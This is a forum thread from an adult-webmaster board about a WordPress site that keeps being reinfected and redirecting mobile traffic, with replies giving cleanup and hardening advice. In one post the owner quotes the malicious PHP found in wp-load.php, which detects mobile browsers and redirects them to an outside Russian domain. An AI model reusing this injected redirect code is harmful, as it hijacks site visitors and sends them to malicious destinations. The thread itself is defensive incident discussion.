Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums.

You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today!

If you have any problems with the registration process or your account login, please contact us.

Post New Thread Reply

Register GFY Rules Calendar
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >
Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed.

 
Thread Tools
Old 02-20-2015, 01:16 AM   #1
druid66
Confirmed User
 
Join Date: Feb 2006
Posts: 994
Amerinoc and hacking vs others

Need advice.
my friend have wordpress site which is constantly being hacked and redirects mobile traffic to some other sites. redirect starts by altering one of wordpress core files. is it possible to put some monitor on such file to locate where this hack comes from or is it to hard to do?

obviously hes on amerinoc and seems that it isn't going to stop, how's others hosting services could deal with this, can you recommend me one that would take care of such stuff without constant need of checking your site and removing hack manually?
__________________
Pure Japan japanese babes blog
druid66 is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-20-2015, 01:20 AM   #2
shake
frc
 
Industry Role:
Join Date: Jul 2003
Location: Bitcoin wallet
Posts: 4,664
I had WordPress blogs on Amerinoc for about 2 years and never had an issue. It is more likely to be a plugin or theme that is causing the issue.
shake is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-20-2015, 01:20 AM   #3
Manfap
Confirmed User
 
Manfap's Avatar
 
Industry Role:
Join Date: Jan 2013
Posts: 2,617
Your friend needs to learn how to secure wp.
A properly configured wp install, you cannot edit the core files.
Manfap is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-20-2015, 01:23 AM   #4
druid66
Confirmed User
 
Join Date: Feb 2006
Posts: 994
hack is coming back on fresh install of wp, number of plugins are tiny, plugins have positive review, site has wordfence installed on it which is not bad protection plugin, what else can we do? just looking for something we may miss..
__________________
Pure Japan japanese babes blog
druid66 is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-20-2015, 01:26 AM   #5
druid66
Confirmed User
 
Join Date: Feb 2006
Posts: 994
and don't get me wrong - i like guys from amerinoc, they were always helpful for me and for a friend of mine, just wanna gather here some reviews from you based on your experience, how others hosting providers would deal with it? is it possible to monitor one file etc..?
__________________
Pure Japan japanese babes blog
druid66 is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-20-2015, 01:46 AM   #6
Manfap
Confirmed User
 
Manfap's Avatar
 
Industry Role:
Join Date: Jan 2013
Posts: 2,617
Free theme?

What else is on the account, virtual account or dedicated?

Sometimes, there can be a virus on your pc that hits your ftp and corrupts wp installs.
Manfap is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-20-2015, 02:27 AM   #7
Paz
Confirmed User
 
Paz's Avatar
 
Industry Role:
Join Date: Jun 2012
Posts: 457
List the plugins and themes here with version numbers - you only need one bad one and you're screwed. REvslider is a popular one to hack at the mo.

Re-installing WP isn't enough you have to sanitise all the wp- folders and check all the files, I had one hack that ran a jpg as a php - these people are very good at leaving lots of backdoors in the db and files so they can get back in.

You should also check your htaccess (post here), download the theme and look for anything in your php such as eval(xxxx and nuke those files.

If you are confident you've cleaned everything up then change the ftp password, mysql credentials and wp login and re-isntall but once these people have gotten a hold it's very difficult to keep them out.

If you wp install is only a few pages I'd delete everything in the public_html and in the db and start again with a fresh install with the same URL structure.

Fingers crossed.
Paz is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-20-2015, 05:00 AM   #8
druid66
Confirmed User
 
Join Date: Feb 2006
Posts: 994
admins are on it now will let you know results, thanks for tips guys.

new fresh install, deleted everything on server's domain folder and hack come back few days later.

theme is free but have positive reviews and is up to date, server is vps.
__________________
Pure Japan japanese babes blog
druid66 is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-20-2015, 09:46 AM   #9
MasonSquelch
Registered User
 
MasonSquelch's Avatar
 
Industry Role:
Join Date: Jun 2014
Location: Germany
Posts: 51
The 'Wordfence' plugin is very helpful: it scans life traffic on your site, allows you to block users, IPs, whole IP blocks; it regularly scans your WP install and detects altered files. Seems that's what your friend is looking for.
__________________
Mental Sinema - Wanktrance Outfitter
MasonSquelch is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-20-2015, 10:17 AM   #10
Ferus
Bye - Left to do stuff
 
Industry Role:
Join Date: Feb 2013
Posts: 4,109
Is he one of those that sets the folder security to 777?
Ferus is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-20-2015, 10:29 AM   #11
Miguel T
♦ Web Developer ♦
 
Miguel T's Avatar
 
Industry Role:
Join Date: May 2005
Location: Full-Stack Developer
Posts: 12,468
All In One Security & Firewall.
I use that plugin
__________________

Full Stack Webdeveloper: HTML5/CSS3, jQuery, AJAX, ElevatedX, NATS, MechBunny, Wordpress
Miguel T is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-20-2015, 10:50 AM   #12
druid66
Confirmed User
 
Join Date: Feb 2006
Posts: 994
we discovered hack like 2 weeks back, since then theres wordfence active, it sends email that someone altered file but did this only once after 2 days file become altered again and wordfence didn't raise the alarm - i've checked file manually and noticed hack redirecting mobile traffic to some ukrainian site (earlier was china).

so i don't know what to think about wordfence it worked once so far and yes this live traffic feature, blocking ip's are awesome but for real we need to protect files from being altered and wordfence failed to send notice with it.

none folder is 777 i think.

any more comes to your mind guys, let me know.

i'll keep you posted with progress.

btw:

check your wp-load.php file, i found such code on the bottom (redirecting to russian site, on other site today i've found redirect to ukrainian one)

"
if(preg_match('/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i',$_SERVER['HTTP_USER_AGENT']) && $_COOKIE["m_"] != 1)
{
@setcookie('m_', '1', time()+3600, '/');
@header("Location: http://hvoraem-net.ru/top/top1.php");
die();}"
__________________
Pure Japan japanese babes blog
druid66 is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-20-2015, 11:04 AM   #13
NoWhErE
Too lazy to set a custom title
 
NoWhErE's Avatar
 
Industry Role:
Join Date: Sep 2005
Location: Canada
Posts: 10,204
I've been through the same thing.

Amerinoc isnt the problem, its your setup. Its a corrupted theme or plugin or open folder thats letting them get in.

It could also be a virus on your computer or a compromised email account/ftp that allows them to gain access.
__________________
skype: lordofthecameltoe
NoWhErE is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-20-2015, 11:09 AM   #14
druid66
Confirmed User
 
Join Date: Feb 2006
Posts: 994
already scanned my pc by few tools.
theme if different than before.
plugins.. last time there was 2 plugins and hack was back.

wonder what amerinoc guys would find.

i'm not saying it's amerinoc fault, i would like to know how others hosting companies deal with such situations. i'm interesting in finding source of the leak not to blame anyone.
__________________
Pure Japan japanese babes blog
druid66 is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-20-2015, 11:18 AM   #15
Harmon
( ͡ʘ╭͜ʖ╮͡ʘ)
 
Harmon's Avatar
 
Industry Role:
Join Date: Mar 2004
Posts: 20,000
Quote:
Originally Posted by druid66 View Post
already scanned my pc by few tools.
theme if different than before.
plugins.. last time there was 2 plugins and hack was back.

wonder what amerinoc guys would find.

i'm not saying it's amerinoc fault, i would like to know how others hosting companies deal with such situations. i'm interesting in finding source of the leak not to blame anyone.
Amerinoc (phatservers) for well over 2 years with zero problems.

Was the theme from the WP repository? Or did you happen to download a "nulled" theme?
__________________
[email protected]
Harmon is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-20-2015, 11:20 AM   #16
druid66
Confirmed User
 
Join Date: Feb 2006
Posts: 994
theme is from wp popular or suggested (don't remember)
__________________
Pure Japan japanese babes blog
druid66 is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-20-2015, 11:26 AM   #17
sinclair
Confirmed User
 
sinclair's Avatar
 
Industry Role:
Join Date: Aug 2004
Posts: 1,431
Quote:
Originally Posted by shake View Post
I had WordPress blogs on Amerinoc for about 2 years and never had an issue. It is more likely to be a plugin or theme that is causing the issue.


Have been through several other several shared hosting providers..I always go back to Amerinoc.
__________________
--
skype:vmgsinclair

"Imagine a world in which every single person on the planet is given free access to the sum of all human sex."
sinclair is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Post New Thread Reply
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >

Bookmarks

Tags
amerinoc, hack, site, wordpress, hows, stop, hosting, services, hacking, deal, constant, checking, manually, removing, stuff, care, hard, recommend, redirect, sites, starts, altering, traffic, constantly, hacked



Advertising inquiries - marketing at gfy dot com

Contact Admin - Advertise - GFY Rules - Top

©2000-, AI Media Network Inc



Powered by vBulletin
Copyright © 2000- Jelsoft Enterprises Limited.